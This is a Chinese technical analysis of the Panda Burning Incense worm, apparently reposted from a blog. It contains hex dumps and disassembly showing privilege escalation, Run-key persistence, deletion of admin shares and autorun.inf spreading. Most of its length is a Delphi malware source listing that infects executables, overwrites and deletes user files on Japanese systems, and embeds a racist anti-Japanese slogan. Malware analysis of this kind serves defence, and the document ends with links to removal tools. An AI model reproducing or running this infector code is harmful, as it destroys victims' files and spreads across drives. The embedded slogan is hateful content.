09 00 00 00 24 20 2F 64 65 6C 20 2F 79 00 00 00 63 6D 64 2E 65 78 65 20 2F 63 20 6E 65 74 20 73

68 61 72 65 20 61 64 6D 69 6E 24 20 2F 64 65 6C 20 2F 79 00 55 8B EC 6A 00 6A 00 33 C0 55 68 A9

*利用WinHEX查看十六进制码,发现偏移为0000C4D0的十六进制的ASCII转换为明文为

cmd.exe /c net share $ /del /y
cmd.exe /c net share admin$ /del /y

****************************************************************
FF FF FF FF 0B 00 00 00 73 70 63 6F 6C 73 76 2E 65 78 65 00 73 76 63 73 68 61 72 65 00 00 00 00

53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65

6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 00 00 00

*利用WinHEX查看十六进制码,发现偏移为0000C5C0的十六进制的ASCII转换为明文为

Software\Microsoft\Windows\CurrentVersion\Run

****************************************************************
53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65

6E 74 56 65 72 73 69 6F 6E 5C 45 78 70 6C 6F 72 65 72 5C 41 64 76 61 6E 63 65 64 5C 46 6F 6C 64

65 72 5C 48 69 64 64 65 6E 5C 53 48 4F 57 41 4C 4C 5C 43 68 65 63 6B 65 64 56 61 6C 75 65 00 00

*利用WinHEX查看十六进制码,发现偏移为0000C610的十六进制的ASCII转换为明文为

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
*即禁用文件夹隐藏选项

****************************************************************
FF FF FF FF 0B 00 00 00 3A 5C 73 65 74 75 70 2E 65 78 65 00 FF FF FF FF 0D 00 00 00 3A 5C 61 75

74 6F 72 75 6E 2E 69 6E 66 00 00 00 FF FF FF FF 51 00 00 00 5B 41 75 74 6F 52 75 6E 5D 0D 0A 4F

50 45 4E 3D 73 65 74 75 70 2E 65 78 65 0D 0A 73 68 65 6C 6C 65 78 65 63 75 74 65 3D 73 65 74 75

70 2E 65 78 65 0D 0A 73 68 65 6C 6C 5C 41 75 74 6F 5C 63 6F 6D 6D 61 6E 64 3D 73 65 74 75 70 2E

65 78 65 0D 0A 00 00 00

*利用WinHEX查看十六进制码,发现偏移为0000B920的十六进制的ASCII转换为明文为

X:\setup.exe
X:\autorun.inf
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

****************************************************************

*利用W32dsm反汇编脱壳后的setup.exe。阅读其汇编代码,发现汇编代码中包含蠕虫提升系统权限的动作

****************************************************************
* Referenced by a CALL at Address:
|:004062EC
|
:00406218 53 push ebx
:00406219 83C4D0 add esp, FFFFFFD0
:0040621C 8D442404 lea eax, dword ptr [esp+04]
:00406220 50 push eax ; TokenHandle
:00406221 6A20 push 00000020 ; DesiredAccess

* Reference To: kernel32.GetCurrentProcess, Ord:0000h
|
:00406223 E81CE9FFFF Call 00404B44
:00406228 50 push eax ; ProcessHandle

* Reference To: advapi32.OpenProcessToken, Ord:0000h
|
:00406229 E87EE8FFFF Call 00404AAC
:0040622E 8D442408 lea eax, dword ptr [esp+08]
:00406232 50 push eax ; lpLuid

* Possible StringData Ref from Code Obj ->"SeDebugPrivilege"
|
:00406233 68B4624000 push 004062B4
:00406238 6A00 push 00000000 ; lpSystemName

* Reference To: advapi32.LookupPrivilegeValueA, Ord:0000h
|
:0040623A E865E8FFFF Call 00404AA4 ;LookupPrivilegeValueA
:0040623F 8B442408 mov eax, dword ptr [esp+08]
:00406243 89442424 mov dword ptr [esp+24], eax
:00406247 8B44240C mov eax, dword ptr [esp+0C]
:0040624B 89442428 mov dword ptr [esp+28], eax
:0040624F C744242001000000 mov [esp+20], 00000001
:00406257 33DB xor ebx, ebx
:00406259 895C242C mov dword ptr [esp+2C], ebx
:0040625D 54 push esp ; ReturnLength
:0040625E 8D442414 lea eax, dword ptr [esp+14]
:00406262 50 push eax ; PreviousState
:00406263 6A10 push 00000010 ; BufferLength
:00406265 8D44242C lea eax, dword ptr [esp+2C]
:00406269 50 push eax ; NewState
:0040626A 6A00 push 00000000 ; DisableAllPrivileges
:0040626C 8B442418 mov eax, dword ptr [esp+18]
:00406270 50 push eax ; TokenHandle

* Reference To: advapi32.AdjustTokenPrivileges, Ord:0000h
|
:00406271 E826E8FFFF Call 00404A9C
:00406276 8B442408 mov eax, dword ptr [esp+08]
:0040627A 89442414 mov dword ptr [esp+14], eax
:0040627E 8B44240C mov eax, dword ptr [esp+0C]
:00406282 89442418 mov dword ptr [esp+18], eax
:00406286 C744241001000000 mov [esp+10], 00000001
:0040628E 83CB02 or ebx, 00000002
:00406291 895C241C mov dword ptr [esp+1C], ebx
:00406295 54 push esp
:00406296 6A00 push 00000000
:00406298 8B442408 mov eax, dword ptr [esp+08]
:0040629C 50 push eax
:0040629D 8D44241C lea eax, dword ptr [esp+1C]
:004062A1 50 push eax
:004062A2 6A00 push 00000000
:004062A4 8B442418 mov eax, dword ptr [esp+18]
:004062A8 50 push eax ; TokenHandle

* Reference To: advapi32.AdjustTokenPrivileges, Ord:0000h
|
:004062A9 E8EEE7FFFF Call 00404A9C ;AdjustTokenPrivileges
:004062AE 83C430 add esp, 00000030
:004062B1 5B pop ebx
:004062B2 C3 ret
****************************************************************

*蠕虫通过修改注册表创建自启动项,以下是其所修改的内容部分

****************************************************************
Software\Microsoft\Windows\CurrentVersion\Run
svcshare=指向\%system32%\drivers\spoclsv.exe

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040D122(C)
|
:0040D124 55 push ebp
:0040D125 8BEC mov ebp, esp
:0040D127 6A00 push 00000000
:0040D129 6A00 push 00000000
:0040D12B 33C0 xor eax, eax
:0040D12D 55 push ebp
:0040D12E 68A9D14000 push 0040D1A9
:0040D133 64FF30 push dword ptr fs:[eax]
:0040D136 648920 mov dword ptr fs:[eax], esp
:0040D139 E8FE9DFFFF call 00406F3C
:0040D13E 8D45F8 lea eax, dword ptr [ebp-08]
:0040D141 E87683FFFF call 004054BC
:0040D146 FF75F8 push [ebp-08]

* Possible StringData Ref from Code Obj ->"drivers\"
|
:0040D149 68BCD14000 push 0040D1BC

* Possible StringData Ref from Code Obj ->"spcolsv.exe"
|
:0040D14E 68D0D14000 push 0040D1D0
:0040D153 8D45FC lea eax, dword ptr [ebp-04]
:0040D156 BA03000000 mov edx, 00000003
:0040D15B E82C6EFFFF call 00403F8C
:0040D160 8B45FC mov eax, dword ptr [ebp-04]
:0040D163 E8646FFFFF call 004040CC
:0040D168 50 push eax

* Possible StringData Ref from Code Obj ->"svcshare"
|
:0040D169 B9DCD14000 mov ecx, 0040D1DC

* Possible StringData Ref from Code Obj ->"Software\Microsoft\Windows\CurrentVersion\Run"
|
:0040D16E BAE8D14000 mov edx, 0040D1E8
:0040D173 B801000080 mov eax, 80000001
:0040D178 E84F81FFFF call 004052CC
:0040D17D 33C9 xor ecx, ecx

* Possible StringData Ref from Code Obj ->"SOFTWARE\Microsoft\Windows\CurrentVersion\Expl"
->"orer\Advanced\Folder\Hidden\SHOWALL\CheckedVal"
->"ue"
|
:0040D17F BA20D24000 mov edx, 0040D220
:0040D184 B802000080 mov eax, 80000002
:0040D189 E87289FFFF call 00405B00
:0040D18E 33C0 xor eax, eax
:0040D190 5A pop edx
:0040D191 59 pop ecx
:0040D192 59 pop ecx
:0040D193 648910 mov dword ptr fs:[eax], edx
:0040D196 68B0D14000 push 0040D1B0
****************************************************************

通过调用cmd.exe命令行程序删除隐藏共享

****************************************************************
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040D097(C)
|
:0040D05B 6A00 push 00000000

* Possible StringData Ref from Code Obj ->"cmd.exe /c net share "
|
:0040D05D 68D4D04000 push 0040D0D4
:0040D062 8D45F4 lea eax, dword ptr [ebp-0C]
:0040D065 8B55FC mov edx, dword ptr [ebp-04]
:0040D068 8A541AFF mov dl, byte ptr [edx+ebx-01]
:0040D06C E8BB6DFFFF call 00403E2C
:0040D071 FF75F4 push [ebp-0C]

* Possible StringData Ref from Code Obj ->"$ /del /y"
|
:0040D074 68F4D04000 push 0040D0F4 ; uCmdShow
:0040D079 8D45F8 lea eax, dword ptr [ebp-08]
:0040D07C BA03000000 mov edx, 00000003
:0040D081 E8066FFFFF call 00403F8C
:0040D086 8B45F8 mov eax, dword ptr [ebp-08]
:0040D089 E83E70FFFF call 004040CC
:0040D08E 50 push eax ; lpCmdLine

* Reference To: kernel32.WinExec, Ord:0000h
|
:0040D08F E8407BFFFF Call 00404BD4 ;WinExec
:0040D094 4B dec ebx
:0040D095 85DB test ebx, ebx
:0040D097 75C2 jne 0040D05B

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040D059(C)
|
:0040D099 6A00 push 00000000 ; uCmdShow

* Possible StringData Ref from Code Obj ->"cmd.exe /c net share admin$ /del "
->"/y"
|
:0040D09B 6800D14000 push 0040D100

* Reference To: kernel32.WinExec, Ord:0000h
|
:0040D0A0 E82F7BFFFF Call 00404BD4 ;WinExec
:0040D0A5 33C0 xor eax, eax
:0040D0A7 5A pop edx
:0040D0A8 59 pop ecx
:0040D0A9 59 pop ecx
:0040D0AA 648910 mov dword ptr fs:[eax], edx
:0040D0AD 68C7D04000 push 0040D0C7
****************************************************************

熊猫烧香病毒部分源代码(From Csdn)
//Date:2007-02-01
program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = $12EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量

{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主图标的大小--744字节
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
ID = $44444444; //感染标记
//垃圾码,以备写入
Catchword = ''''''''''''''''If a race need to be killed out, it must be Yamato. '''''''''''''''' +
''''''''''''''''If a country need to be destroyed, it must be Japan! '''''''''''''''' +
''''''''''''''''*** W32.Japussy.Worm.A ***'''''''''''''''';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external ''''''''''''''''Kernel32.dll''''''''''''''''; //函数声明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用,退出
if CompareText(FileName, ''''''''''''''''JAPUSSY.EXE'''''''''''''''') = 0 then //是自己则不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //检查PE文件头
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //检查感染标记
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//得到被感染文件的主图标(744字节),存入流
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//头文件
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//写入病毒体主图标之前的数据
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
//写入目前程序的主图标
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
//写入病毒体主图标到病毒体尾部之间的数据
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//写入宿主程序
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//写入已感染的标记
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //替换宿主文件
DstStream.Free;
end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只读属性
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
try
Size := GetFileSize(FileHandle, nil); //文件大小
i := 0;
Randomize;
Max := Random(15); //写入垃圾码的随机次数
if Max < 5 then
Max := 5;
Mass := Size div Max; //每个间隔块的大小
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//写入垃圾码,将文件彻底破坏掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //关闭文件
end;
DeleteFile(PChar(FileName)); //删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
D := Chr(i + 65);
Str := D + '''''''''''''''':\'''''''''''''''';
DiskType := GetDriveType(PChar(Str));
//得到本地磁盘和网络盘
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr <> 16) and (SearchRec.Name <> ''''''''''''''''.'''''''''''''''') and
(SearchRec.Name <> ''''''''''''''''..'''''''''''''''') then
Result := 0 //不是目录
else if (SearchRec.Attr = 16) and (SearchRec.Name <> ''''''''''''''''.'''''''''''''''') and
(SearchRec.Name <> ''''''''''''''''..'''''''''''''''') then
Result := 1 //不是根目录
else Result := 2; //是根目录
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = ''''''''''''''''.EXE'''''''''''''''') or (Ext = ''''''''''''''''.SCR'''''''''''''''') then
begin
InfectOneFile(Fn); //感染可执行文件
end
else if (Ext = ''''''''''''''''.HTM'''''''''''''''') or (Ext = ''''''''''''''''.HTML'''''''''''''''') or (Ext = ''''''''''''''''.ASP'''''''''''''''') then
begin
//感染HTML和ASP文件,将Base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
else if Ext = ''''''''''''''''.WAB'''''''''''''''' then //Outlook地址簿文件
begin
//获取Outlook邮件地址
end
else if Ext = ''''''''''''''''.ADC'''''''''''''''' then //Foxmail地址自动完成文件
begin
//获取Foxmail邮件地址
end
else if Ext = ''''''''''''''''IND'''''''''''''''' then //Foxmail地址簿文件
begin
//获取Foxmail邮件地址
end
else
begin
if IsJap then //是倭文操作系统
begin
if (Ext = ''''''''''''''''.DOC'''''''''''''''') or (Ext = ''''''''''''''''.XLS'''''''''''''''') or (Ext = ''''''''''''''''.MDB'''''''''''''''') or
(Ext = ''''''''''''''''.MP3'''''''''''''''') or (Ext = ''''''''''''''''.RM'''''''''''''''') or (Ext = ''''''''''''''''.RA'''''''''''''''') or
(Ext = ''''''''''''''''.WMA'''''''''''''''') or (Ext = ''''''''''''''''.ZIP'''''''''''''''') or (Ext = ''''''''''''''''.RAR'''''''''''''''') or
(Ext = ''''''''''''''''.MPEG'''''''''''''''') or (Ext = ''''''''''''''''.ASF'''''''''''''''') or (Ext = ''''''''''''''''.JPG'''''''''''''''') or
(Ext = ''''''''''''''''.JPEG'''''''''''''''') or (Ext = ''''''''''''''''.GIF'''''''''''''''') or (Ext = ''''''''''''''''.SWF'''''''''''''''') or
(Ext = ''''''''''''''''.PDF'''''''''''''''') or (Ext = ''''''''''''''''.CHM'''''''''''''''') or (Ext = ''''''''''''''''.AVI'''''''''''''''') then
SmashFile(Fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + ''''''''''''''''*.*'''''''''''''''', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + ''''''''''''''''\'''''''''''''''', Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系统
IsJap := True; //去死吧!
DriverList := GetDrives; //得到可写的磁盘列表
Len := Length(DriverList);
while True do //死循环
begin
for i := Len downto 1 do //遍历每个磁盘驱动器
LoopFiles(DriverList + '''''''''''''''':\'''''''''''''''', ''''''''''''''''*.*''''''''''''''''); //感染之
SendMail; //发带毒邮件
Sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
else //WinNT
begin
//远程线程映射到Explorer进程
//哪位兄台愿意完成之?
end;
//如果是原始病毒体自己
if CompareText(ExtractFileName(ParamStr(0)), ''''''''''''''''Japussy.exe'''''''''''''''') = 0 then
InfectFiles //感染和发邮件
else //已寄生于宿主程序上了,开始工作
begin
TmpFile := ParamStr(0); //创建临时文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + ''''''''''''''''.exe''''''''''''''''; //真正的宿主文件,多一个空格
ExtractFile(TmpFile); //分离之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, ''''''''''''''''.'''''''''''''''', Si, Pi); //创建新进程运行之
InfectFiles; //感染和发邮件
end;
end.

E.解决方案

瑞星熊猫烧香专用清除工具
http://shadu.baidu.com/zhuansha/downloadZS.jsp?id=140

金山毒霸熊猫烧香病毒专杀工具
http://shadu.baidu.com/zhuansha/downloadZS.jsp?id=134

==============EOF=====================================================


你可能感兴趣的:(熊猫烧香病毒技术分析及应急解决方案)